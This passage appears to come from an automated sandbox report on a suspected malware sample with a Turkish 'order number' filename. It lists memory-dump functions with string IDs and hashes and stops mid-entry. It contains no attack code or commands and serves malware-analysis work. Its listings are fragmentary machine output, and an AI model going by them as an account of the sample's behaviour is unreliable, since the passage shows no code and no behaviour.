                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$@
                                                                  • API String ID: 0-149943524
                                                                  • Opcode ID: 5ec650439811e67803ba7c3f9ff1c26d34a2ec200c3dbc24a984ac9203346af7
                                                                  • Instruction ID: 4ff881383fdd2c991920f68aa602444b2cdfde6f419c74fc33d61503a771c6dd
                                                                  • Opcode Fuzzy Hash: 5ec650439811e67803ba7c3f9ff1c26d34a2ec200c3dbc24a984ac9203346af7
                                                                  • Instruction Fuzzy Hash: AA3299B85083518BD724CF15C480B6EB7E1EF99788F50492EF9959B3A0EF74C984CB92
                                                                  Function 32D35702 Relevance: 3.1, APIs: 2, Instructions: 104timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID:
                                                                  • API String ID: 3446177414-0
                                                                  • Opcode ID: a98485cacd42df33d581d8f8f8248f2ba5c82c5fb32aa8e41a7b7600e2e6f971
                                                                  • Instruction ID: 9c4761296b00419cedeb1294f4f757b91256f32ac95e0d69a975d87d06891003
                                                                  • Opcode Fuzzy Hash: a98485cacd42df33d581d8f8f8248f2ba5c82c5fb32aa8e41a7b7600e2e6f971
                                                                  • Instruction Fuzzy Hash: 8931BE75202B02EFE7569B24DA80B89F7A5FF48794F505025EA4187B50DBB0E821CFE0
                                                                  Function 32DFA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: `$`
                                                                  • API String ID: 0-197956300
                                                                  • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                  • Instruction ID: 8f1422b61b6bfda0a5c72034b5a9587bea3a3e1c24dd69dfea4194e48e208125
                                                                  • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                  • Instruction Fuzzy Hash: 86C1E071204342ABE714CF24C840B5BBBE5BFC4B58F054A2DF995CA390DBB6D505CB9A
                                                                  Function 32DAE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID: Legacy$UEFI
                                                                  • API String ID: 2994545307-634100481
                                                                  • Opcode ID: b4c0d286d17f28b5c987fb72497d3fdf36e65ceffdbfff143ad774f26a2153ee
                                                                  • Instruction ID: b4bb5436bf132868fff2b41d42218d5e921b659b2817982ccb09a3a23e2b3351
                                                                  • Opcode Fuzzy Hash: b4c0d286d17f28b5c987fb72497d3fdf36e65ceffdbfff143ad774f26a2153ee
                                                                  • Instruction Fuzzy Hash: 11611AB2E003189FEB15CFA88990FADBBB5BB44744F504079E659EB351DB71A904CBA0
                                                                  Function 32D4F720 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: $$$
                                                                  • API String ID: 3446177414-233714265
                                                                  • Opcode ID: c196fa1da173b78764d95cbb5c060507e762043eb6d8eac0536d4beab8210f31
                                                                  • Instruction ID: 70608bba9b0674241388d03a62e6364ed0bb8db1dad9db51f323212bd784775b
                                                                  • Opcode Fuzzy Hash: c196fa1da173b78764d95cbb5c060507e762043eb6d8eac0536d4beab8210f31
                                                                  • Instruction Fuzzy Hash: BF61BCB5A01749DFEB20CFA4C680BADB7B1BF48708F504469D515AF790CFB4A981CBA0
                                                                  Function 32D3A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 32D3A2FB
                                                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 32D3A309
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                  • API String ID: 0-2876891731
                                                                  • Opcode ID: 80cee5dd68dc24ed5b9e2ec514a54f8b741524b298574d95878e58a491ecf978
                                                                  • Instruction ID: 5c939e97ad3119b889833a1234835d4e58a506b83365390b064abb81cc360e78
                                                                  • Opcode Fuzzy Hash: 80cee5dd68dc24ed5b9e2ec514a54f8b741524b298574d95878e58a491ecf978
                                                                  • Instruction Fuzzy Hash: 3241BC78B01745CBDB06CFA9C884B9A77B4FF85348F2040A9E984DB3A5EB75D900CB50
                                                                  Function 32D6329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: .Local\$@
                                                                  • API String ID: 0-380025441
                                                                  • Opcode ID: 09afd00207158ae009584e86232f16d15908852c81c4a38398d12bfec486b60c
                                                                  • Instruction ID: f0dbd3bc178fe2939ef5303c0846bf30fb66f87a35ae17e74bffcf4953659668
                                                                  • Opcode Fuzzy Hash: 09afd00207158ae009584e86232f16d15908852c81c4a38398d12bfec486b60c
                                                                  • Instruction Fuzzy Hash: 3C3161765493449FD351CF28C980A6BBBE8EBC5B58F84092EF9D483750DA34DD04CBA2
                                                                  Function 32D3C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: MUI
                                                                  • API String ID: 0-1339004836
                                                                  • Opcode ID: a883c1ba581fe11fdb6ae0f8df4e014cde6ea6d4602777ae1c4ecdabc0ff6e1b
                                                                  • Instruction ID: 463926e88b90185dd681d8c97cdd8c9bc458cd01174b00075df11f809a8e8779
                                                                  • Opcode Fuzzy Hash: a883c1ba581fe11fdb6ae0f8df4e014cde6ea6d4602777ae1c4ecdabc0ff6e1b
                                                                  • Instruction Fuzzy Hash: 52826A79E023188BEB16CFA9C880BDDB7B1BF48354F108169EA59AB394DB709D41CF50
                                                                  Function 32DDA118 Relevance: 2.1, APIs: 1, Instructions: 591timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID:
                                                                  • API String ID: 3446177414-0
                                                                  • Opcode ID: 5d77b3338c981b368ad0752a42e1802f1ac71b0d0f38afaa619a492aff6439f3
                                                                  • Instruction ID: ea2a54ac741ea8f912a3c3aea4db27e80ec7fba705d23f64fcc1021c1a5e17d7
                                                                  • Opcode Fuzzy Hash: 5d77b3338c981b368ad0752a42e1802f1ac71b0d0f38afaa619a492aff6439f3
                                                                  • Instruction Fuzzy Hash: E1229CB8204B919BEB18CF2DC090762B7F1AF45348F54C45AE8D68F385EB75E592CB60
                                                                  Function 32D5B2C0 Relevance: 1.9, Strings: 1, Instructions: 629COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @[2@[2
                                                                  • API String ID: 0-2854983874
                                                                  • Opcode ID: 2d6b84e213b1bec05791af55b2fc98d751bcd6cef750703a9d86a3b2d0fec55c
                                                                  • Instruction ID: 8c8763f8c10c5092aa77cbab848b86c6a9e040b816495af67c2a481aff89907e
                                                                  • Opcode Fuzzy Hash: 2d6b84e213b1bec05791af55b2fc98d751bcd6cef750703a9d86a3b2d0fec55c
                                                                  • Instruction Fuzzy Hash: 3032C3B5E00259DFDF14CF68C880BAEBBB1FF54758F640129E845AB384EB759941CB90
                                                                  Function 32D31131 Relevance: 1.8, APIs: 1, Instructions: 259timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID:
                                                                  • API String ID: 3446177414-0
                                                                  • Opcode ID: 46f5dd717e34b7594895b1e0354561057579cb7936941d59964afb755907aa98
                                                                  • Instruction ID: eef811ceaf0b267dfc2dc8a7be92ddbe18cfeaaf0469fde61828c07a36d8fb94
                                                                  • Opcode Fuzzy Hash: 46f5dd717e34b7594895b1e0354561057579cb7936941d59964afb755907aa98
                                                                  • Instruction Fuzzy Hash: 13B111B56093818FD355CF28C480A5ABBF1BF88704F544A6EF899CB352D770E945CB92
                                                                  Function 32D37370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2335c86b992a3bc4808104feb478be12d53d95a0eacf7ed2204fe7c96d68d2aa
                                                                  • Instruction ID: 1289aaf4fa95c72f93fd46deb4729573808e6cfdc0cf510a6e12d45c22a0d88b
                                                                  • Opcode Fuzzy Hash: 2335c86b992a3bc4808104feb478be12d53d95a0eacf7ed2204fe7c96d68d2aa
                                                                  • Instruction Fuzzy Hash: 59A17AB5A09741DFE315CF28C480A1ABBE5BF88754F10492EFA859B350EB70E945CF92
                                                                  Function 32D37703 Relevance: 1.7, APIs: 1, Instructions: 179COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2f9ea9e31e933a05bfccfac145345c66387752259412ce0d62dae4c1b91c7485
                                                                  • Instruction ID: 6ed6315da772257a522b98f0857003ee2e137bc58254077991d3c98d37e35c70
                                                                  • Opcode Fuzzy Hash: 2f9ea9e31e933a05bfccfac145345c66387752259412ce0d62dae4c1b91c7485
                                                                  • Instruction Fuzzy Hash: 9A614175A01606EFEB09DF68C480AADFBB5BF48744F24866AD559A7300DB70A941CFD0
                                                                  Function 32D6F603 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d703490ff3bbc7008fc1557d820396404f8c836c88a88ccdab3b2b2b735aae5d
                                                                  • Instruction ID: a9d17a53157330dde06c7d155b0d4079f1f0b93b43adf654f45baa9f3a02462d
                                                                  • Opcode Fuzzy Hash: d703490ff3bbc7008fc1557d820396404f8c836c88a88ccdab3b2b2b735aae5d
                                                                  • Instruction Fuzzy Hash: 574147B4D013889FDB14DFA9C881AADBBF4FB48744F90856EE49AA7311DB309941CF60
                                                                  Function 32D3262C Relevance: 1.6, APIs: 1, Instructions: 119timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID:
                                                                  • API String ID: 3446177414-0
                                                                  • Opcode ID: 7ea12b62c76abe0a07ec2991f2cb92da825fb1e07f8b8ebd68b33363958fb988
                                                                  • Instruction ID: 4a025edd8bc950c86636c643088a79bcb087f27202d59db359ed451a0787750d
                                                                  • Opcode Fuzzy Hash: 7ea12b62c76abe0a07ec2991f2cb92da825fb1e07f8b8ebd68b33363958fb988
                                                                  • Instruction Fuzzy Hash: 1941BFB5902700CFD716EF28C945B59B7B1FF44350F1186AACA569B3A0DB709D81CF61
                                                                  Function 32D2B480 Relevance: 1.6, APIs: 1, Instructions: 100timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID:
                                                                  • API String ID: 3446177414-0
                                                                  • Opcode ID: 16d1aac1c9f17819bc6d3dd4c3e61782db5d1b490667ea6ca69555105491d5ab
                                                                  • Instruction ID: a0c3fdf835e646743ce4a42378fdd200c35a44711bda29d6dd646c76a5de9125
                                                                  • Opcode Fuzzy Hash: 16d1aac1c9f17819bc6d3dd4c3e61782db5d1b490667ea6ca69555105491d5ab
                                                                  • Instruction Fuzzy Hash: 1B312F72501304AFC311DF24C880B6A77A9EF857A8F554669EC459F391DBB1ED82CBE0
                                                                  Function 32D357C0 Relevance: 1.6, APIs: 1, Instructions: 92timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID:
                                                                  • API String ID: 3446177414-0
                                                                  • Opcode ID: 81cb07a1df3b07df7e26032931d6946100a6041dbdd17609e544e37810749188
                                                                  • Instruction ID: 51af4110195ce539de204f2d16fcd804817b49dc542c828909074e9697dcbf8d
                                                                  • Opcode Fuzzy Hash: 81cb07a1df3b07df7e26032931d6946100a6041dbdd17609e544e37810749188
                                                                  • Instruction Fuzzy Hash: 2B31AC35716A05FFE7469B24EA40A89BBA6FF88340F54A025FE4087B50DB70E831CBD0
                                                                  Function 32D33616 Relevance: 1.6, APIs: 1, Instructions: 84timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID:
                                                                  • API String ID: 3446177414-0
                                                                  • Opcode ID: cb8081cd47af904e57eb172adc214abb5ffd64f4a569df060c86903ba42aaaa4
                                                                  • Instruction ID: 4e8490c930bbaafee6c93a39241e394db5a906be1422500ef5615df16ee7375a
                                                                  • Opcode Fuzzy Hash: cb8081cd47af904e57eb172adc214abb5ffd64f4a569df060c86903ba42aaaa4
                                                                  • Instruction Fuzzy Hash: 412104751063909FE762AF14CA48B1ABBA0FF80B14F894569EE460BB50CF70E844CBD1
                                                                  Function 32D292FF Relevance: 1.5, APIs: 1, Instructions: 35timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID:
                                                                  • API String ID: 3446177414-0
                                                                  • Opcode ID: f9743af586df177e2f837ad139e24dad8a85ed1728e4cff021e4bbc97d6e219e
                                                                  • Instruction ID: 677f5cb1fe74bb3c65cd60866acb1280fabe6bd9dd2038bbfedf8cb103642c54
                                                                  • Opcode Fuzzy Hash: f9743af586df177e2f837ad139e24dad8a85ed1728e4cff021e4bbc97d6e219e
                                                                  • Instruction Fuzzy Hash: 28F02432100340AFD331DB19CD04F8BBBFDEF84B14F29051DE98293290CAA0F945C660
                                                                  Function 32D6A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: GlobalTags
                                                                  • API String ID: 0-1106856819
                                                                  • Opcode ID: daf1cfc49c48cc1c2e3c3bf64394243c580f21f4c90cb5aa9c5bd857d95afa49
                                                                  • Instruction ID: ef3514a26e8d5a624fc34bb80ed7fce860df23cd181c47672b91019990c8a05b
                                                                  • Opcode Fuzzy Hash: daf1cfc49c48cc1c2e3c3bf64394243c580f21f4c90cb5aa9c5bd857d95afa49
                                                                  • Instruction Fuzzy Hash: 087170B9E0031ACFDF18CFA8D5A0A9DBBB1BF48744F10812AE845A7740DB749841CFA0
                                                                  Function 32D3973A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @
                                                                  • API String ID: 0-2766056989
                                                                  • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                                  • Instruction ID: 77a8a6bb84aec0acc873c3bf841025d795d5fbd50d49932a197e7b5dd8d932d4
                                                                  • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                                  • Instruction Fuzzy Hash: 6F616BB5D02259AFDB12CFA9C844BDEBBB4FF84754F10452AE911A7390DB749A01CBA0
                                                                  Function 32DBF7AF Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.2633223888.0000000032D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 32D00000, based on PE: true
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E29000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000004.00000002.2633223888.0000000032E9E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_32d00000_S#U0130PAR#U0130#U015e No.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @
                                                                  • API String ID: 0-2766056989
                                                                  • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
